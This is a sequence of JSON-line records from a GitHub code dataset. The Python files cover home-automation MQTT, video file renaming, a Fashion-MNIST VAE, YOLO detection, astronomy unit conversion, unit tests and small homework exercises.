main(args)\r\n","repo_name":"luohaohaoluo/MPEDANet-pytorch","sub_path":"TempCode/code_pytorch/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":12026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4501039011","text":"#!/usr/bin/python3\n\"\"\"sets virtual sensor domoticz-uptime\"\"\"\nimport json\nimport os\n\nimport paho.mqtt.client as mqtt\nfrom uptime import uptime\n\nIDX = 205\nMQTT_IP = os.environ[\"MQTT_IP\"]\n\n\ndef format_uptime(uptime_in_seconds):\n \"\"\"formats uptime seconds into days hours minutes\"\"\"\n (days, remainder) = divmod(uptime_in_seconds, 24 * 60 * 60)\n (hours, remainder) = divmod(remainder, 60 * 60)\n (minutes, remainder) = divmod(remainder, 60)\n\n return f\"{days}d {hours}h {minutes}m\"\n\n\ndef format_payload(svalue):\n \"\"\"formats mqtt payload\"\"\"\n data = {\"idx\": IDX, \"nvalue\": 0, \"svalue\": svalue}\n return json.dumps(data)\n\n\ndef send_payload(payload):\n \"\"\"send mqtt payload\"\"\"\n client = mqtt.Client(\"uptime\")\n client.connect(MQTT_IP)\n client.publish(\"domoticz/in\", payload)\n client.disconnect()\n\n\nsend_payload(format_payload(format_uptime(int(uptime()))))\n","repo_name":"mvanvuren/domoticz-scripts","sub_path":"python/uptime_domoticzpi.py","file_name":"uptime_domoticzpi.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12130387422","text":"# \nimport os, re\n\ndef stg_log(msg = \"test log\", level=\"info\", filename = \"./vc.log\", do_print = 1):\n \"\"\"\n msg: info message to be printed\n level: info or warning or error\n \"\"\"\n from datetime import datetime\n std_log_msg = f\"vc: {datetime.now().isoformat(timespec='seconds')}: [{level}]: {msg}\"\n if (do_print):\n print(std_log_msg)\n std_log_msg += \"\\n\"\n with open(filename, 'a') as fo:\n fo.write(std_log_msg)\n\ndef check_platform():\n \"\"\"\n str returned\n \"\"\"\n import platform\n return platform.system()\n\nclass videoExport(object):\n\n def __init__(self):\n self._tree = {\"basic_path\": \"/\", \"exp_list\": []}\n self._platform = check_platform()\n if self._platform == \"Windows\":\n self._slash = '\\\\'\n else:\n self._slash = '/'\n stg_log(f\"videoExport loaded in platform: {self._platform}\")\n \n def get_file_tree(self):\n from pathlib import PurePath\n local_file_path = os.getcwd()\n pHandle = PurePath(local_file_path)\n # Current path\n self._local_path = pHandle.parents[0]\n self._tree[\"basic_path\"] = str(self._local_path)\n # list all dirs\n self._fp_list = os.listdir(self._local_path)\n # fp_list_copy = self._fp_list\n # self._fpa_list = []\n # stg_log(self._fp_list)\n for every_fp in self._fp_list:\n if not (re.fullmatch(r'edited_(s_)?\\d{1,12}', every_fp)):\n continue\n if os.path.isdir(str(self._local_path) + self._slash + every_fp):\n self._tree[\"exp_list\"].append({\"exp_dir\": every_fp})\n # stg_log(self._tree)\n stg_log(\"Get file tree done\")\n\n def export_info(self, exp_file = \"infoList.csv\"):\n import json, csv\n export_csv_file = str(self._local_path) + self._slash + exp_file\n for every_video in self._tree[\"exp_list\"]:\n stg_log(f\"export info: {every_video}\")\n info_location = str(self._local_path) + self._slash + every_video[\"exp_dir\"] + self._slash + \"infoFiles\"\n raw_info_list = os.listdir(info_location)\n useable_info_list = []\n for every_info in raw_info_list:\n # episode number is shorter than 5 characters\n if re.fullmatch(r'entry.\\d{1,5}.json', every_info):\n useable_info_list.append(every_info)\n with open(info_location + self._slash + every_info, 'rb') as fi:\n # file_reads = fi.read()\n # print(file_reads)\n entry_file = json.load(fi)\n title = entry_file[\"title\"]\n create_time = entry_file[\"time_create_stamp\"]\n update_time = entry_file[\"time_update_stamp\"]\n avid = entry_file[\"avid\"]\n bvid = entry_file[\"bvid\"]\n if \"owner_id\" in entry_file:\n owner = entry_file[\"owner_id\"]\n else:\n owner = 0\n full_description = entry_file[\"page_data\"][\"download_subtitle\"]\n stg_log(f\"title: {title}, create_time: {create_time},\" +\n f\"update_time: {update_time}, avid: {avid}, bvid: {bvid},\" +\n f\"owner: {owner}, full_description: {full_description}\")\n with open(export_csv_file, \"a\", newline='') as fo:\n csv_writer = csv.writer(fo,delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow([avid, bvid, owner,\n create_time, update_time,\n title, full_description])\n stg_log(\"export info done\")\n\n def search_for_info(self, keyword=\"\"):\n pass\n\n # keep sequence\n def rename_video(self):\n import json\n for every_video in self._tree[\"exp_list\"]:\n stg_log(f\"rename video: {every_video}\")\n info_location = str(self._local_path) + self._slash + every_video[\"exp_dir\"] + self._slash + \"infoFiles\"\n raw_info_list = os.listdir(info_location)\n for every_info in raw_info_list:\n # episode number is shorter than 5 characters\n if re.fullmatch(r'entry.\\d{1,5}.json', every_info):\n file_name_split = every_info.split('.')\n episode_num = file_name_split[1]\n with open(info_location + self._slash + every_info, 'rb') as fi:\n entry_file = json.load(fi)\n full_description = entry_file[\"page_data\"][\"download_subtitle\"]\n basic_path = str(self._local_path) + self._slash + every_video[\"exp_dir\"]\n source_file_name = basic_path + self._slash + episode_num + \".mp4\"\n # tbd..\n rename_file_name = basic_path + self._slash + full_description + \".mp4\"\n # Check if video file for every episode exists\n stg_log(f\"{source_file_name} will be renamed with {rename_file_name}\")\n if os.path.exists(source_file_name):\n # What if the description contains a char that cannot be used in filename?\n os.rename(source_file_name, rename_file_name)\n stg_log(\"rename succeed\")\n else:\n stg_log(\"entry.json does not mark a video\", \"warning\")\n stg_log(\"rename video done\")\n\n def rename_folder(self):\n import json\n for every_video in self._tree[\"exp_list\"]:\n stg_log(f\"rename video: {every_video}\")\n info_location = str(self._local_path) + self._slash + every_video[\"exp_dir\"] + self._slash + \"infoFiles\"\n raw_info_list = os.listdir(info_location)\n for every_info in raw_info_list:\n # episode number is shorter than 5 characters\n if re.fullmatch(r'entry.\\d{1,5}.json', every_info):\n # file_name_split = every_info.split('.')\n # episode_num = file_name_split[1]\n with open(info_location + self._slash + every_info, 'rb') as fi:\n entry_file = json.load(fi)\n title = entry_file[\"title\"]\n # basic_path = str(self._local_path) + self._slash + every_video[\"exp_dir\"]\n source_folder_name = str(self._local_path) + self._slash + every_video[\"exp_dir\"]\n # tbd..\n rename_folder_name = str(self._local_path) + self._slash + title\n # Check if video file for every episode exists\n stg_log(f\"{source_folder_name} will be renamed with {rename_folder_name}\")\n if os.path.exists(source_folder_name):\n os.rename(source_folder_name, rename_folder_name)\n stg_log(\"rename succeed\")\n else:\n stg_log(\"entry.json does not mark a video\", \"warning\")\n break\n stg_log(\"rename folder done\")\n\n def move_video(self):\n pass\n\ndef load_args():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-a',\n '--action',\n required=True,\n type=str,\n help=\"What to do next?\"\n )\n return parser\n\ndef main():\n myHandle = videoExport()\n myHandle.get_file_tree()\n\n args = load_args().parse_args()\n the_action = args.action.replace(\" \", '')\n if the_action == \"expinfo\":\n myHandle.export_info()\n elif the_action == \"revideo\":\n myHandle.rename_video()\n elif the_action == \"refold\":\n myHandle.rename_folder()\n else:\n print(\"what do you want?\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Kumo-YZX/video-concrete","sub_path":"handleExp.py","file_name":"handleExp.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70476935606","text":"import numpy as np\n\nmatrix=np.random.rand(4,4)*10\na,c=np.split(matrix,2)\na,b=np.split(a,2,1)\nc,d=np.split(c,2,1)\nprint(matrix)\n\nresult=np.array([np.mean(a),np.mean(b),np.mean(c),np.mean(d)])\nresult=np.reshape(result,(2,2))\nprint(result)","repo_name":"xhy0303/some-homework-ppt","sub_path":"作业/Python程序设计/实验五/代码/实验/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16242372532","text":"from mapreduce.MasterWorker import MasterWorker\nfrom mapreduce.wordcount.WordCountMapWorker import WordCountMapWorker\nfrom mapreduce.wordcount.WordCountReduceWorker import WordCountReduceWorker\nfrom mapreduce.MasterWorker import MasterWorker\n\nif __name__ == '__main__':\n # Init parameters\n storage_dir = '../storage'\n output_dir = '../output'\n input_filenames = ['input-1.txt', 'input-2.txt', 'input-3.txt', 'input-4.txt', 'input-5.txt']\n intermediate_filenames = ['intermediate-1.txt','intermediate-2.txt','intermediate-3.txt','intermediate-4.txt','intermediate-5.txt']\n output_filename = 'output.txt'\n keys = ['apple', 'banana', 'cranberry', 'durian', 'elderberry', 'fig']\n map_workers = [WordCountMapWorker() for i in range(len(input_filenames))]\n reduce_workers = [WordCountReduceWorker() for i in range(len(keys))]\n\n # Master worker\n master = MasterWorker(map_workers, reduce_workers, storage_dir, input_filenames, intermediate_filenames, output_filename, keys)\n master.assign_map_workers()\n master.assign_reduce_workers()\n master.execute()","repo_name":"alantanlc/map-reduce","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28958828361","text":"# from ultralytics import YOLO\n# import cv2\n#\n# model = YOLO('../Yolo-Weights/yolov8n.pt')\n# results = model(\"Images/3.png\", show=True)\n# cv2.waitKey(0)\n#\n# # video_path = 'path/to/video/file.mp4'\n# # cap = cv2.VideoCapture(video_path)\n\n\nfrom ultralytics import YOLO\nimport cv2\n\n# Load YOLO model\nmodel = YOLO(\"../Yolo-Weights/yolov8l.pt\")\n\n# Open video file\nvideo_path = 'cctv/cctv.mp4'\ncap = cv2.VideoCapture(video_path)\n\n# Process each frame of the video\nwhile True:\n ret, frame = cap.read()\n\n if not ret:\n break\n\n # Detect humans in the frame\n results = model(frame)\n\n # Filter out only human detections\n human_detections = results.xyxy[0][results.xyxy[0][:, -1] == 0]\n\n # Draw bounding boxes around humans\n for detection in human_detections:\n x1, y1, x2, y2, _ = detection\n cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)\n\n # Display the frame with human detections\n cv2.imshow('Human Detections', frame)\n\n # Break the loop if 'q' key is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the video capture and close the windows\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"khavjhav/TestCCTV","sub_path":"Chapter 5 - Running Yolo/Yolo-Basics.py","file_name":"Yolo-Basics.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24008445570","text":"\"\"\"\nhttps://www.acmicpc.net/problem/11399\n\n사람들이 줄을 서는 순서에 따라 돈을 인출하는데 걸리는 최소시간 구하기\n\"\"\"\n\nN = int(input())\nP = list(map(int, input().split()))\n\nP.sort()\n\nfor k in range(1, N):\n P[k] += P[k-1]\n\nprint(sum(P))\n","repo_name":"dhwangdev/Algorithm","sub_path":"Baekjoon/Greedy/11399_LeastTimeATM.py","file_name":"11399_LeastTimeATM.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45506215484","text":"import os\nimport unittest\n\nfrom wshubsapi.hub import UnsuccessfulReplay\nfrom wshubsapi.hubs_inspector import HubsInspector\nfrom wshubsapi.test.utils.hubs_utils import remove_hubs_subclasses\n\nfrom Test.testingUtils import create_compiler_uploader_mock, create_sender_mock\nfrom libs.CompilerUploader import CompilerUploader\nfrom libs.Version import Version\nfrom libs.WSCommunication.Hubs.CodeHub import CodeHub\nfrom libs.PathsManager import PathsManager as pm\nfrom flexmock import flexmock, flexmock_teardown\n# do not remove\nimport libs.WSCommunication.Hubs\n\n\nclass TestCodeHub(unittest.TestCase):\n def setUp(self):\n HubsInspector.inspect_implemented_hubs(force_reconstruction=True)\n self.hexFilePath = os.path.join(pm.TEST_SETTINGS_PATH, \"CompilerUploader\", \"hex.hex\")\n self.codeHub = HubsInspector.get_hub_instance(CodeHub)\n \"\"\":type : CodeHub\"\"\"\n\n self.sender = create_sender_mock()\n\n self.originalConstruct = CompilerUploader.construct\n self.compileUploaderMock, self.CompileUploaderConstructorMock = create_compiler_uploader_mock()\n self.board = CompilerUploader.DEFAULT_BOARD\n\n def tearDown(self):\n flexmock_teardown()\n remove_hubs_subclasses()\n\n def test_construct_getsCompilerUploader(self):\n self.assertIsInstance(self.originalConstruct(), CompilerUploader)\n\n def test_construct_getsCompilerUploaderWithRightBoard(self):\n compiler1 = self.originalConstruct(\"uno\")\n compiler2 = self.originalConstruct(\"diemilanove\")\n\n self.assertEqual(compiler1.board, \"uno\")\n self.assertEqual(compiler2.board, \"diemilanove\")\n\n def test_construct_getsSameObjectIfPassedSameBoard(self):\n compiler1 = self.originalConstruct(\"uno\")\n compiler2 = self.originalConstruct(\"uno\")\n\n self.assertIs(compiler1, compiler2)\n\n def test_compile_senderIsAdvisedCompilingIsOngoing(self):\n self.sender.should_receive(\"is_compiling\").once()\n\n self.codeHub.compile(\"myCode\", self.sender)\n\n def test_compile_callsCompilerCompile(self):\n code = \"myCode\"\n (self.compileUploaderMock\n .should_receive(\"compile\")\n .once()\n .with_args(code)\n .and_return([True, None]))\n\n self.codeHub.compile(code, self.sender)\n\n def test_upload_senderIsAdvisedCodeIsUploadingWithPort(self):\n port = \"PORT\"\n self.compileUploaderMock.should_receive(\"get_port\").and_return(port).once()\n self.compileUploaderMock.should_receive(\"upload\").and_return((True, {})).once()\n\n self.codeHub.upload(\"myCode\", self.board, self.sender)\n\n def test_upload_successfulUploadReturnsTrue(self):\n self.compileUploaderMock.should_receive(\"upload\").and_return((True, {})).once()\n\n result = self.codeHub.upload(\"myCode\", self.board, self.sender)\n\n self.assertEqual(result, \"PORT\")\n\n def test_upload_unsuccessfulUploadReturnsErrorString(self):\n uploadReturn = (False, {\"err\": \"errorMessage\"},)\n self.compileUploaderMock.should_receive(\"upload\").and_return(uploadReturn).once()\n\n result = self.codeHub.upload(\"myCode\", self.board, self.sender)\n\n self.assertIsInstance(result, UnsuccessfulReplay)\n self.assertEqual(result.reply, uploadReturn[1][\"err\"])\n\n def test_uploadHexUrl_successfulHexUploadCallsUploadAvrHexAndReturnsTrue(self):\n self.compileUploaderMock.should_receive(\"upload_avr_hex\").and_return((True, {})).once()\n\n result = self.codeHub.upload_hex(\"hexText\", self.board, self.sender)\n\n self.assertEqual(result, \"PORT\")\n\n def test_upload_unsuccessfulHexUploadReturnsErrorString(self):\n\n uploadReturn = (False, {\"err\": \"errorMessage\"},)\n self.compileUploaderMock.should_receive(\"upload_avr_hex\").and_return(uploadReturn).once()\n\n result = self.codeHub.upload_hex(\"hexText\", self.compileUploaderMock.board, self.sender)\n\n self.assertIsInstance(result, UnsuccessfulReplay)\n self.assertEqual(result.reply, uploadReturn[1][\"err\"])\n","repo_name":"bq/web2board","sub_path":"src/Test/unit/WSCommunication/Hubs/testCodeHub.py","file_name":"testCodeHub.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"32428524997","text":"from astropy import constants\nfrom astropy import units as u\nimport numpy as np\n\ndef tb2s(tb, nu):\n \"\"\"Convert blackbody temperature to spectral radiance s_nu at frequency nu.\n\n Args:\n tb (Quantity): Blackbody temperature\n nu (Quantity): frequency where the spectral radiance is evaluated\n\n Returns:\n (Quantity) s_nu with same dimensions as tb\n nominal unit: W*sr−1*m−2*Hz−1\n \"\"\"\n h = constants.h\n c = constants.c\n k_b = constants.k_B\n nu = nu.to(u.Hz)\n tb = tb.to(u.K)\n x = h * nu / (k_b * tb)\n return 2 * h * nu**3 / c**2 / (np.exp(x) - 1)\n\n\ndef s2tcmb(s_nu, nu):\n \"\"\"Convert spectral radiance s_nu at frequency nu to t_cmb.\n\n t_cmb is defined in the CMB community as the offset from the\n mean CMB temperature assuming a linear relation between t_cmb\n and s_nu, the t_cmb/s_nu slope is evalutated at the mean CMB\n temperature.\n\n Args:\n s_nu (Quantity): spectral radiance s_nu (nominal unit: W*sr−1*m−2*Hz−1)\n nu (Quantity): frequency where the evaluation is perfomed\n\n Returns:\n (Quantity) t_cmb with same dimensions as tb.\n\n \"\"\"\n T_cmb = 2.72548 * u.K # K from Fixsen, 2009, ApJ 707 (2): 916–920\n h = constants.h\n c = constants.c\n k_b = constants.k_B\n nu = nu.to(u.Hz)\n x = h * nu / (k_b * T_cmb)\n\n slope = 2 * k_b * nu**2 / c**2 * ((x.value / 2) / np.sinh(x.value / 2)) ** 2\n return s_nu / slope\n\n\ndef tb2tcmb(tb, nu):\n \"\"\"Convert blackbody temperature to t_cmb as defined above.\n\n Args:\n tb (Quantity): Blackbody temperature\n nu (Quantity): frequency where the spectral radiance is evaluated\n\n Returns:\n (Quantity) t_cmb with same dimensions as tb\n\n \"\"\"\n s_nu = tb2s(tb, nu)\n result = s2tcmb(s_nu, nu)\n return result.decompose()\n","repo_name":"simonsobs/sotodlib","sub_path":"sotodlib/toast/ops/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"28018350559","text":"#!/usr/bin/env python\nfrom http_res import HttpRequest\nclass API(HttpRequest):\n def __init__(self, nodes = None, **kwargs):\n super().__init__(nodes=nodes, **kwargs)\n\n def get_info(self):\n body= dict()\n return self.http_call(\n api='chain',\n interface='get_info',\n body=body\n )\n\n\n\nif __name__ == '__main__':\n nodes = API(['http://fullnode.eoshenzhen.io:8888'])\n print(nodes.get_info())","repo_name":"EOShenzhen/EOS_Python_API","sub_path":"eosapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17156216784","text":"# https://github.com/hwalsuklee/tensorflow-mnist-VAE/blob/master/vae.py\nimport numpy as np\nimport utility\nimport matplotlib.pyplot as plt\nimport sys\nimport tensorflow as tf\nfrom sklearn.model_selection import KFold\nEPS = 1e-10\nimport pdb\n\n# ------------------------------------------------------------------------------\n# Load Data\n# ------------------------------------------------------------------------------\n\npath = '/Users/matthewolson/Documents/Data/Fashion'\nimages, labels = utility.read_fashion(range(10), dataset='training', path=path)\n\n\n# rescale images to be between 0 / 1\nimages = images / float(images.max())\n\n# make some plots\nix = np.random.permutation(len(images))[:20]\nutility.plot_multiple_images(images[ix].reshape(-1, 28, 28), 4, 5)\nplt.savefig('data_images.png', format='png', dpi=300)\nplt.show()\n\n# ------------------------------------------------------------------------------\n# Build VAE Model\n# ------------------------------------------------------------------------------\n\n\ndef gaussian_encoder(X, n_hidden, n_latent):\n with tf.variable_scope('guassian_encoder'):\n he_init = tf.contrib.layers.variance_scaling_initializer()\n hidden1 = tf.layers.dense(X, n_hidden, activation=tf.nn.elu,\n kernel_initializer=he_init)\n hidden2 = tf.layers.dense(\n hidden1, n_hidden, activation=tf.nn.tanh, kernel_initializer=he_init)\n gaussian_params = tf.layers.dense(hidden2, n_latent * 2,\n kernel_initializer=he_init)\n mean = gaussian_params[:, :n_latent]\n stddev = EPS + tf.nn.softplus(gaussian_params[:, n_latent:])\n return mean, stddev\n\n\ndef bernoulli_decoder(Z, n_hidden, n_output):\n with tf.variable_scope('bernoulli_decoder'):\n # pdb.set_trace()\n he_init = tf.contrib.layers.variance_scaling_initializer()\n hidden1 = tf.layers.dense(Z, n_hidden, activation=tf.nn.tanh,\n kernel_initializer=he_init)\n hidden2 = tf.layers.dense(hidden1, n_hidden, activation=tf.nn.elu,\n kernel_initializer=he_init)\n p = tf.layers.dense(hidden2, n_output, activation=tf.nn.sigmoid,\n kernel_initializer=he_init)\n return p\n\n\ndef autoencoder(X, n_input, n_hidden, n_latent):\n # pdb.set_trace()\n # encoding\n mu, sigma = gaussian_encoder(X, n_hidden, n_latent)\n\n # reparametrization technique\n z = mu + sigma * tf.random_normal(tf.shape(mu), 0.0, 1)\n\n # decoding\n p = bernoulli_decoder(z, n_hidden, n_input)\n\n # loss\n likelihood = tf.reduce_sum(X * tf.log(p) + (1 - X) * tf.log(1 - p), 1)\n kl_divergence = 0.5 * \\\n tf.reduce_sum(tf.square(mu) + tf.square(sigma) -\n tf.log(EPS + tf.square(sigma)) - 1, 1)\n likelihood = tf.reduce_mean(likelihood)\n kl_divergence = tf.reduce_mean(kl_divergence)\n\n loss = kl_divergence - likelihood\n return p, z, loss, -likelihood, kl_divergence\n\n# ------------------------------------------------------------------------------\n# Train Model\n# ------------------------------------------------------------------------------\n\nn_hidden = 500\nn_inputs = 28 * 28\nn_latent = 50\n\nn_epochs = 500\nbatch_size = 128\nlearning_rate = 0.001\n\nutility.reset_graph()\nX = tf.placeholder(tf.float32, shape=[None, n_inputs], name='img')\np, z, loss, neg_likelihood, kl_divergence = autoencoder(\n X, n_inputs, n_hidden, n_latent)\noptimizer = tf.train.AdamOptimizer(learning_rate)\ntraining_op = optimizer.minimize(loss)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n sess.run(init)\n\n for epoch in xrange(n_epochs):\n kf = KFold(n_splits=len(images) // batch_size, shuffle=True)\n batches = kf.split(images)\n for _, batch in batches:\n sess.run(training_op, feed_dict={X: images[batch]})\n loss_total, loss_lhood, loss_kl = sess.run([loss, neg_likelihood,\n kl_divergence],\n feed_dict={X: images})\n print(\"Epoch %d: L_tot %03.2f L_likelihood %03.2f L_divergence %03.2f\" % (\n epoch, loss_total, loss_lhood, loss_kl))\n saver.save(sess, 'fashion_vae_50.ckpt')\n\n# ------------------------------------------------------------------------------\n# Show Distribution of Labelled Data\n# ------------------------------------------------------------------------------\n\n# pass z through with X, label by color\nsaver = tf.train.Saver()\nix = np.random.permutation(len(images))[:1000]\nwith tf.Session() as sess:\n saver.restore(sess, 'fashion_vae_2.ckpt')\n z_vals = sess.run(z, feed_dict={X: images[ix]})\n\nlabels_set = list(set(labels[ix]))\nfor i in xrange(len(labels_set)):\n clothing_ix = labels[ix] == labels_set[i]\n plt.scatter(z_vals[clothing_ix, 0], z_vals[clothing_ix, 1], alpha=0.9)\nplt.savefig('latent_images.png', format='png', dpi=300)\nplt.show()\n\n\n# ------------------------------------------------------------------------------\n# Generate Examples\n# ------------------------------------------------------------------------------\n\n# pass p through with X\n\nn_images = 20\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n init.run()\n saver.restore(sess, 'fashion_vae_50.ckpt')\n img = sess.run(p, feed_dict={z: np.random.randn(20, 50)})\n\nutility.plot_multiple_images(img.reshape(-1, 28, 28), 4, 5)\nplt.savefig('random_images.png', format='png', dpi=300)\nplt.show()\n\n# ------------------------------------------------------------------------------\n# JUNK\n# ------------------------------------------------------------------------------\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\nsc = StandardScaler()\nsc.fit(images)\nimages_ = sc.fit_transform(images)\npca = PCA(n_components=2)\npca.fit(images_)\n\nix = np.random.permutation(len(images))[:3000]\nU = pca.fit_transform(images_)\nU = U[ix]\n\nlabels_set = list(set(labels[ix]))\nfor i in xrange(len(labels_set)):\n clothing_ix = labels[ix] == labels_set[i]\n plt.scatter(U[clothing_ix, 0], U[clothing_ix, 1], alpha=0.9)\nplt.savefig('pca_images.png', format='png', dpi=300)\nplt.show()\n","repo_name":"molson2/DeepLearning","sub_path":"Week5/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":6404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19290322835","text":"# Create a method that find the 5 most common lottery numbers in lottery.csv\nimport re\n\n\ndef five_most_frequent(file_name, top_num):\n resullt = []\n with open(file_name, \"r\") as f:\n contents = f.readlines()\n num_count = {}\n for line in contents:\n lottery_num = re.search(r\"Ft;([\\d]{1,2};[\\d]{1,2};[\\d]{1,2};[\\d]{1,2};[\\d]{1,2})\", line).group(1)\n for num in lottery_num.split(\";\"):\n try:\n num_count[num] += 1\n except:\n num_count[num] = 1\n sorted_num = sorted(num_count.items(), key=lambda x: x[1], reverse=True)\n\n for i in range(top_num):\n resullt.append(sorted_num[i][0])\n return resullt\n\n\nprint(\n five_most_frequent(\"C:\\\\Users\\\\Yu_Wang\\\\projects\\\\greenfox\\\\yuuu1234\\\\DSA-2019\\\\week-02\\\\day-2\\\\lotterty-file\", 5))\n\n","repo_name":"green-fox-academy/yuuu1234","sub_path":"DSA-2019/week-02/day-2/count_lottery.py","file_name":"count_lottery.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73617869046","text":"from invenio_access.permissions import system_identity\nfrom invenio_communities import current_communities\nfrom invenio_communities.communities.records.api import Community\nfrom invenio_communities.members import Member\nfrom invenio_requests import current_requests_service\nfrom invenio_requests.records import Request\n\nfrom invenio_rdm_records.cli import (\n create_records_custom_field,\n custom_field_exists_in_records,\n)\nfrom invenio_rdm_records.fixtures.demo import create_fake_community, create_fake_record\nfrom invenio_rdm_records.fixtures.tasks import (\n create_demo_community,\n create_demo_inclusion_requests,\n create_demo_invitation_requests,\n create_demo_record,\n get_authenticated_identity,\n)\nfrom invenio_rdm_records.proxies import current_rdm_records_service\nfrom invenio_rdm_records.records import RDMDraft, RDMRecord\nfrom invenio_rdm_records.requests import CommunitySubmission\n\n\ndef test_create_fake_demo_draft_record(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo record creation works without failing.\"\"\"\n user_id = users[0].id\n\n create_demo_record(user_id, create_fake_record(), publish=False)\n RDMDraft.index.refresh()\n\n user_identity = get_authenticated_identity(user_id)\n drafts = current_rdm_records_service.search_drafts(\n user_identity, is_published=False, q=\"versions.index:1\"\n )\n assert drafts.total > 0\n\n create_demo_record(user_id, create_fake_record(), publish=True)\n RDMRecord.index.refresh()\n\n records = current_rdm_records_service.search(user_identity)\n assert records.total > 0\n\n\ndef test_create_fake_demo_communities(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo communities creation works without failing.\"\"\"\n user_id = users[0].id\n\n create_demo_community(user_id, create_fake_community())\n Community.index.refresh()\n\n user_identity = get_authenticated_identity(user_id)\n communities = current_communities.service.search(user_identity)\n assert communities.total > 0\n\n\ndef test_create_fake_demo_inclusion_requests(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo inclusion requests creation works without failing.\"\"\"\n user_id = users[0].id\n\n create_demo_record(user_id, create_fake_record(), publish=False)\n RDMDraft.index.refresh()\n create_demo_community(user_id, create_fake_community())\n Community.index.refresh()\n\n create_demo_inclusion_requests(user_id, 1)\n Request.index.refresh()\n\n user_identity = get_authenticated_identity(user_id)\n _t = CommunitySubmission.type_id\n reqs = current_requests_service.search(user_identity, type=_t)\n assert reqs.total > 0\n\n\ndef test_create_fake_demo_invitation_requests(\n app, location, db, search_clear, vocabularies, users\n):\n \"\"\"Assert that demo invitation requests creation works without failing.\"\"\"\n first_user_id = users[0].id\n\n create_demo_record(first_user_id, create_fake_record(), publish=True)\n RDMDraft.index.refresh()\n comm = create_demo_community(first_user_id, create_fake_community())\n Community.index.refresh()\n user_identity = get_authenticated_identity(first_user_id)\n communities = current_communities.service.search(user_identity)\n comm = communities.to_dict()[\"hits\"][\"hits\"][0]\n\n other_user_id = users[1].id\n create_demo_invitation_requests(other_user_id, 1)\n Member.index.refresh()\n\n service = current_communities.service.members\n reqs = service.search_invitations(system_identity, comm[\"id\"])\n assert reqs.total > 0\n\n\ndef test_create_records_custom_fields(app, location, db, search_clear, cli_runner):\n \"\"\"Assert that custom fields mappings are created for records.\"\"\"\n result = cli_runner(create_records_custom_field, \"-f\", \"cern:myfield\")\n assert result.exit_code == 0\n\n record_mapping_field = list(RDMRecord.index.get_mapping().values())[0][\"mappings\"][\n \"properties\"\n ][\"custom_fields\"]\n draft_mapping_field = list(RDMDraft.index.get_mapping().values())[0][\"mappings\"][\n \"properties\"\n ][\"custom_fields\"]\n expected_value = {\n \"dynamic\": \"true\",\n \"properties\": {\n \"cern:myfield\": {\"type\": \"text\", \"fields\": {\"keyword\": {\"type\": \"keyword\"}}}\n },\n }\n assert record_mapping_field == expected_value\n assert draft_mapping_field == expected_value\n\n # check for existence\n RDMRecord.index.refresh()\n RDMDraft.index.refresh()\n\n result = cli_runner(custom_field_exists_in_records, \"-f\", \"cern:myfield\")\n assert result.exit_code == 0\n assert \"Field cern:myfield exists\" in result.output\n\n result = cli_runner(custom_field_exists_in_records, \"-f\", \"unknownfield\")\n assert result.exit_code == 0\n assert \"Field unknownfield does not exist\" in result.output\n","repo_name":"inveniosoftware/invenio-rdm-records","sub_path":"tests/fixtures/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"29490622673","text":"print('制作者:Liu Mingshuai\\n时间:2020年2月22日\\n')\ndangling = ['/*/*', 'qwertyuiop123']\n\n\ndef yodels():\n tries = 3\n while tries > 0:\n yogurt = input('请输入密码:')\n zenning = yogurt == dangling[-1]\n xatom = yogurt == dangling[0]\n if zenning:\n print('加载成功')\n elif xatom:\n xena = input('请输入新密码:')\n dangling.append(xena)\n print('密码修改成功')\n yodels()\n else:\n print('密码错误,请重新输入')\n tries = tries-1\n print('你还有', tries, '次机会.')\n else:\n 